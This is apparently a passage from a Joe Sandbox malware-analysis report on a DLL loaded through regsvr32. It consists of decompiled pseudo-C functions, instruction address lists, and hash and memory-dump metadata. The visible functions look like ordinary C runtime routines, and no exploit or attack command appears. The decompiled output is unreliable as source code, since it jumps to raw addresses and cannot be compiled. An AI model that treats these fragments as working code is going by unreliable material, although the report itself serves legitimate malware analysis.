				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}






























                                                                                                  0x180002a84
                                                                                                  0x180002a84
                                                                                                  0x180002a89
                                                                                                  0x180002a8e
                                                                                                  0x180002a9c
                                                                                                  0x180002aa0
                                                                                                  0x180002aa3
                                                                                                  0x180002aac
                                                                                                  0x180002aaf
                                                                                                  0x180002ab4
                                                                                                  0x180002abb
                                                                                                  0x180002abf
                                                                                                  0x180002ac6
                                                                                                  0x180002aca
                                                                                                  0x180002ad0
                                                                                                  0x180002ad5
                                                                                                  0x180002adc
                                                                                                  0x180002ae4
                                                                                                  0x180002aee
                                                                                                  0x180002afb
                                                                                                  0x180002b06
                                                                                                  0x180002b11
                                                                                                  0x180002b24
                                                                                                  0x180002b26
                                                                                                  0x180002b28
                                                                                                  0x180002b31
                                                                                                  0x180002b3b
                                                                                                  0x180002b4b
                                                                                                  0x180002b55
                                                                                                  0x180002b5f
                                                                                                  0x180002b6b
                                                                                                  0x180002b77
                                                                                                  0x180002b7e
                                                                                                  0x180002b85
                                                                                                  0x180002b8a
                                                                                                  0x180002b8e
                                                                                                  0x180002b93
                                                                                                  0x180002b99
                                                                                                  0x180002ba0
                                                                                                  0x180002ba7
                                                                                                  0x180002bb0
                                                                                                  0x180002bb3
                                                                                                  0x180002bba
                                                                                                  0x180002bc4
                                                                                                  0x180002bce
                                                                                                  0x180002bd1
                                                                                                  0x180002bd3
                                                                                                  0x180002bd7
                                                                                                  0x180002bdb
                                                                                                  0x180002bdd
                                                                                                  0x180002be2
                                                                                                  0x180002be4
                                                                                                  0x180002be7
                                                                                                  0x180002bf2
                                                                                                  0x180002bfc
                                                                                                  0x180002c07
                                                                                                  0x180002c12
                                                                                                  0x180002c14
                                                                                                  0x180002c1a
                                                                                                  0x180002c1f
                                                                                                  0x180002c27
                                                                                                  0x180002c2c
                                                                                                  0x180002c31
                                                                                                  0x180002c33
                                                                                                  0x180002c3b
                                                                                                  0x180002c3f
                                                                                                  0x180002c49
                                                                                                  0x180002c52
                                                                                                  0x180002c7a

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                  • String ID: csm$f
                                                                                                  • API String ID: 2395640692-629598281
                                                                                                  • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                  • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                  • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                  • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                  • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                  • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                  • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 85%
                                                                                                  			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                  0x1800077fc
                                                                                                  0x180007801
                                                                                                  0x180007810
                                                                                                  0x180007818
                                                                                                  0x18000781d
                                                                                                  0x180007824
                                                                                                  0x180007829
                                                                                                  0x18000782c
                                                                                                  0x180007833
                                                                                                  0x180007836
                                                                                                  0x180007838
                                                                                                  0x18000783d
                                                                                                  0x18000783f
                                                                                                  0x180007844
                                                                                                  0x180007847
                                                                                                  0x180007849
                                                                                                  0x18000784d
                                                                                                  0x18000784f
                                                                                                  0x180007854
                                                                                                  0x18000785b
                                                                                                  0x180007860
                                                                                                  0x180007863
                                                                                                  0x180007865
                                                                                                  0x180007869
                                                                                                  0x18000786b
                                                                                                  0x180007870
                                                                                                  0x180007876
                                                                                                  0x18000787d
                                                                                                  0x180007882
                                                                                                  0x180007885
                                                                                                  0x180007889
                                                                                                  0x18000788b
                                                                                                  0x180007890
                                                                                                  0x180007897
                                                                                                  0x1800078b5

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _set_statfp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1156100317-0
                                                                                                  • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                  • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                  • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                  • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3702945584-0
                                                                                                  • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                  • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                  • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                  • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3702945584-0
                                                                                                  • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                  • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                  • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                  • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 68%
                                                                                                  			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}















                                                                                                  0x180003800
                                                                                                  0x180003803
                                                                                                  0x180003807
                                                                                                  0x18000380b
                                                                                                  0x18000381a
                                                                                                  0x18000381e
                                                                                                  0x180003834
                                                                                                  0x180003836
                                                                                                  0x18000383b
                                                                                                  0x180003848
                                                                                                  0x18000384c
                                                                                                  0x180003855
                                                                                                  0x18000385e
                                                                                                  0x180003867
                                                                                                  0x180003870
                                                                                                  0x180003874
                                                                                                  0x180003884
                                                                                                  0x18000388c
                                                                                                  0x180003891
                                                                                                  0x180003896
                                                                                                  0x18000389b
                                                                                                  0x1800038a2
                                                                                                  0x1800038be

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                  • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                  • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                  • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                  • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 32%
                                                                                                  			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0x5388a1408558
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

















































                                                                                                  0x18000d5b8
                                                                                                  0x18000d5c6
                                                                                                  0x18000d5ca
                                                                                                  0x18000d5d1
                                                                                                  0x18000d5d9
                                                                                                  0x18000d5dd
                                                                                                  0x18000d5e7
                                                                                                  0x18000d5ee
                                                                                                  0x18000d5f5
                                                                                                  0x18000d5fc
                                                                                                  0x18000d606
                                                                                                  0x18000d60a
                                                                                                  0x18000d618
                                                                                                  0x18000d624
                                                                                                  0x18000d629
                                                                                                  0x18000d62d
                                                                                                  0x18000d630
                                                                                                  0x18000d633
                                                                                                  0x18000d63d
                                                                                                  0x18000d64a
                                                                                                  0x18000d64f
                                                                                                  0x18000d65c
                                                                                                  0x18000d65f
                                                                                                  0x18000d664
                                                                                                  0x18000d667
                                                                                                  0x18000d66e
                                                                                                  0x18000d677
                                                                                                  0x18000d67b
                                                                                                  0x18000d683
                                                                                                  0x18000d686
                                                                                                  0x18000d689
                                                                                                  0x18000d69c
                                                                                                  0x18000d6af
                                                                                                  0x18000d6ba
                                                                                                  0x18000d6be
                                                                                                  0x18000d6c8
                                                                                                  0x18000d6cd
                                                                                                  0x18000d6e1
                                                                                                  0x18000d6ea
                                                                                                  0x18000d6f0
                                                                                                  0x18000d6f2
                                                                                                  0x18000d6fc
                                                                                                  0x18000d702
                                                                                                  0x18000d708
                                                                                                  0x18000d71d
                                                                                                  0x18000d72a
                                                                                                  0x18000d72f
                                                                                                  0x18000d73b
                                                                                                  0x18000d740
                                                                                                  0x18000d74b
                                                                                                  0x18000d759
                                                                                                  0x18000d764
                                                                                                  0x18000d766
                                                                                                  0x18000d76a
                                                                                                  0x18000d76e
                                                                                                  0x18000d77b
                                                                                                  0x18000d77d
                                                                                                  0x18000d780
                                                                                                  0x18000d783
                                                                                                  0x18000d794
                                                                                                  0x18000d79d
                                                                                                  0x18000d7ab
                                                                                                  0x18000d7ae
                                                                                                  0x18000d7b6
                                                                                                  0x18000d7bf
                                                                                                  0x18000d7ca
                                                                                                  0x18000d7d0
                                                                                                  0x18000d7d6
                                                                                                  0x18000d7da
                                                                                                  0x18000d7e6
                                                                                                  0x18000d7e8
                                                                                                  0x18000d7eb
                                                                                                  0x18000d7ee
